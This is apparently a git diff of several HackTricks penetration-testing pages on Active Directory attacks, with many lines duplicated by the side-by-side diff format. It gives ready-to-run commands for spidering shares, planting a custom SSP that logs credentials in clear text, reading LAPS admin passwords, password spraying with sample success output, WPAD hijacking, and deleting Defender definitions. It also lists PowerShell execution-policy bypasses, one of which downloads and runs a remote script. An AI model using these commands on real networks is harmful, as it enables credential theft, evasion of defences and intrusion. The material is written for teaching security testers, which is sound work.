Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
* `-M spider_plus [--share <share_name>]` * `-M spider_plus [--share <share_name>]`
* `--pattern txt` * `--pattern txt`

View file

@ -219,10 +219,19 @@ Now that you have some basic credentials you should check if you can **find** an
You can get help from automatic tools such as: You can get help from automatic tools such as:
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)**** * [**Snaffler**](https://github.com/SnaffCon/Snaffler)****
* Or [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
* `-M spider_plus [--share <share_name>]` * `-M spider_plus [--share <share_name>]`
* `--pattern txt` * `--pattern txt`
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
Specially interesting from shares are the files called `Registry.xml` as they **may contain passwords** for users configured with **autologon** via Group Policy. Specially interesting from shares are the files called `Registry.xml` as they **may contain passwords** for users configured with **autologon** via Group Policy.
### Steal NTLM Creds ### Steal NTLM Creds

View file

@ -1,23 +1,28 @@
# Custom SSP
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>
## Custom SSP
# Custom SSP
[Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\ [Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\
You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine. You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.
#### Mimilib ### Mimilib
You can use the `mimilib.dll` binary provided by Mimikatz. **This will log inside a file all the credentials in clear text.**\ You can use the `mimilib.dll` binary provided by Mimikatz. **This will log inside a file all the credentials in clear text.**\
Drop the dll in `C:\Windows\System32\`\ Drop the dll in `C:\Windows\System32\`\
@ -40,7 +45,7 @@ PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packag
And after a reboot all credentials can be found in clear text in `C:\Windows\System32\kiwissp.log` And after a reboot all credentials can be found in clear text in `C:\Windows\System32\kiwissp.log`
#### In memory ### In memory
You can also inject this in memory directly using Mimikatz (notice that it could be a little bit unstable/not working): You can also inject this in memory directly using Mimikatz (notice that it could be a little bit unstable/not working):
@ -51,18 +56,25 @@ misc::memssp
This won't survive reboots. This won't survive reboots.
### Mitigation ## Mitigation
Event ID 4657 - Audit creation/change of `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages` Event ID 4657 - Audit creation/change of `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -4,11 +4,15 @@
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>
@ -16,7 +20,7 @@
**LAPS** allows you to **manage the local Administrator password** (which is **randomised**, unique, and **changed regularly**) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. Passwords are protected in transit from the client to the server using Kerberos v5 and AES. **LAPS** allows you to **manage the local Administrator password** (which is **randomised**, unique, and **changed regularly**) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. Passwords are protected in transit from the client to the server using Kerberos v5 and AES.
When using LAPS, **2 new attributes** appear in the **computer** objects of the domain: **`ms-msc-AdmPwd`** and **`ms-mcs-AdmPwdExpirationTime`**_._ These attributes contains the **plain-text admin password and the expiration time**. Then, in a domain environment, it could be interesting to check **which users can read** these attributes. When using LAPS, 2 new attributes appear in the computer objects of the domain: _ms-msc-AdmPwd_ and _ms-mcs-AdmPwdExpirationTime._ These attributes contains the plain-text admin password and the expiration time. Then, in a domain environment, it could be interesting to check which users can read these attributes.
### Check if activated ### Check if activated
@ -70,35 +74,7 @@ Get-AdmPwdPassword -ComputerName wkstn-2 | fl
Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd
``` ```
### LAPSToolkit Finally, [**LAPSToolkit**](https://github.com/leoloobeek/LAPSToolkit) **can also be useful for the same purpose.**
The [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) facilitates the enumeration of LAPS this with several functions.\
One is parsing **`ExtendedRights`** for **all computers with LAPS enabled.** This will show **groups** specifically **delegated to read LAPS passwords**, which are often users in protected groups.\
An **account** that has **joined a computer** to a domain receives `All Extended Rights` over that host, and this right gives the **account** the ability to **read passwords**. Enumeration may show a user account that can read the LAPS password on a host. This can help us **target specific AD users** who can read LAPS passwords.
```powershell
# Get groups that can read passwords
Find-LAPSDelegatedGroups
OrgUnit Delegated Groups
------- ----------------
OU=Servers,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\Domain Admins
OU=Workstations,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\LAPS Admin
# Checks the rights on each computer with LAPS enabled for any groups
# with read access and users with "All Extended Rights"
Find-AdmPwdExtendedRights
ComputerName Identity Reason
------------ -------- ------
MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\Domain Admins Delegated
MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\LAPS Admins Delegated
# Get computers with LAPS enabled, expirations time and the password (if you have access)
Get-LAPSComputers
ComputerName Password Expiration
------------ -------- ----------
DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf% 12/10/2022 13:24:41
```
## **LAPS Persistence** ## **LAPS Persistence**
@ -129,10 +105,14 @@ Then, just compile the new `AdmPwd.PS.dll` and upload it to the machine in `C:\T
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -59,10 +59,6 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
``` ```
{% endcode %} {% endcode %}
## References
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
<img src="../../.gitbook/assets/image (10).png" alt="" data-size="original"> <img src="../../.gitbook/assets/image (10).png" alt="" data-size="original">
**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. **Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions.

View file

@ -4,11 +4,15 @@
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>
@ -23,74 +27,37 @@ Notice that you **could lockout some accounts if you try several wrong passwords
### Get password policy ### Get password policy
If you have some user credentials or a shell as a domain user you can **get the password policy with**: If you have some user credentials or a shell as a domain user you can get the password policy with:
```bash * `crackmapexec <IP> -u 'user' -p 'password' --pass-pol`
# From Linux * `enum4linx -u 'username' -p 'password' -P <IP>`
crackmapexec <IP> -u 'user' -p 'password' --pass-pol * `(Get-DomainPolicy)."SystemAccess" #From powerview`
enum4linx -u 'username' -p 'password' -P <IP> ### Exploitation
rpcclient -U "" -N 10.10.10.10; Using **crackmapexec:**
rpcclient $>querydominfo
ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
# From Windows
net accounts
(Get-DomainPolicy)."SystemAccess" #From powerview
```
### Exploitation from Linux (or all)
* Using **crackmapexec:**
```bash ```bash
crackmapexec smb <IP> -u users.txt -p passwords.txt crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
``` ```
* Using [**kerbrute**](https://github.com/ropnop/kerbrute) **** (Go) Using [kerbrute](https://github.com/TarlogicSecurity/kerbrute)(python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK
```bash
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```
* [_**spray**_](https://github.com/Greenwolf/Spray) _**(you can indicate number of attempts to avoid lockouts):**_
```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
```
* Using [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK
```bash ```bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
``` ```
* With the `scanner/smb/smb_login` module of **Metasploit**: **Kerbrute** also tells if a username is valid.
![](<../../.gitbook/assets/image (132) (1).png>) Using [kerbrute](https://github.com/ropnop/kerbrute)(Go)
* Using **rpcclient**:
```bash ```bash
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
for u in $(cat users.txt); do ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
``` ```
#### From Windows With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
* With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
```bash ```bash
# with a list of users # with a list of users
@ -100,21 +67,31 @@ done
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file> .\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
``` ```
* With [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (It can generate users from the domain by default and it will get the password policy from the domain and limit tries according to it): With the `scanner/smb/smb_login` module of Metasploit:
```powershell ![](<../../.gitbook/assets/image (132) (1).png>)
With [Invoke-DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1)
```bash
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
``` ```
* With [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)**** or **spray** (read next section).
``` ### Lockout check
Invoke-SprayEmptyPassword
The best way is not to try with more than 5/7 passwords per account.
So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use [_**spray**_](https://github.com/Greenwolf/Spray)_**:**_
```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
``` ```
## Outlook Web Access ## Outlook Web Access
There are multiples tools for p**assword spraying outlook**. There are multiples tools for password spraying outlook.
* With [MSF Owa\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_login/) * With [MSF Owa\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_login/)
* with [MSF Owa\_ews\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_ews\_login/) * with [MSF Owa\_ews\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_ews\_login/)
@ -125,15 +102,25 @@ There are multiples tools for p**assword spraying outlook**.
To use any of these tools, you need a user list and a password / a small list of passwords to spray. To use any of these tools, you need a user list and a password / a small list of passwords to spray.
```bash ```bash
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose $ ./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020 [x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020 [x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020 [x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020 [x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020 [+] Success: s.svensson:Summer2020
[x] Failed: s.sven:Summer2020
[x] Failed: j.jenny:Summer2020
[x] Failed: t.teresa:Summer2020
[x] Failed: t.trump:Summer2020
[x] Failed: a.adams:Summer2020
[x] Failed: l.larsson:Summer2020
[x] Failed: CUBE0X0:Summer2020
[x] Failed: A.ADMIN:Summer2020
[x] Failed: C.CUBE:Summer2020
[+] Success: S.SVENSSON:Summer2020
``` ```
## References ## References :
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying) * [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
* [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell) * [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
@ -144,10 +131,14 @@ To use any of these tools, you need a user list and a password / a small list of
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -261,11 +261,8 @@ As detailed in this [**post**](http://www.labofapenetrationtester.com/2017/05/ab
Another way to **abuse DnsAdmins** group privileges is by creating a **WPAD record**. Membership in this group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack. Server 2008 first introduced the ability to add to a global query block list on a DNS server. By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list. These protocols are quite vulnerable to hijacking, and any domain user can create a computer object or DNS record containing those names. Another way to **abuse DnsAdmins** group privileges is by creating a **WPAD record**. Membership in this group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack. Server 2008 first introduced the ability to add to a global query block list on a DNS server. By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list. These protocols are quite vulnerable to hijacking, and any domain user can create a computer object or DNS record containing those names.
After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack. After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.\
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
{% endcontent-ref %}
## **AD Recycle Bin** ## **AD Recycle Bin**

View file

@ -110,10 +110,15 @@ NISEngineVersion : 0.0.0.0
</strong>RealTimeScanDirection : 0 </strong>RealTimeScanDirection : 0
PSComputerName :</code></pre> PSComputerName :</code></pre>
You could also run: To enumerate it you could also run:
```bash ```bash
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
wmic /namespace:\\root\securitycenter2 path antivirusproduc
sc query windefend
#Delete all rules of Defender (useful for machines without internet access)
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
``` ```
## EFS (Encrypted File System) ## EFS (Encrypted File System)
@ -187,6 +192,32 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode). You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
## PS Execution Policy
By default it is set to **restricted.** Main ways to bypass this policy:
```powershell
1º Just copy and paste inside the interactive PS console
2º Read en Exec
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
3º Read and Exec
Get-Content .runme.ps1 | Invoke-Expression
4º Use other execution policy
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
5º Change users execution policy
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
6º Change execution policy for this session
Set-ExecutionPolicy Bypass -Scope Process
7º Download and execute:
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
8º Use command switch
Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9º Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
```
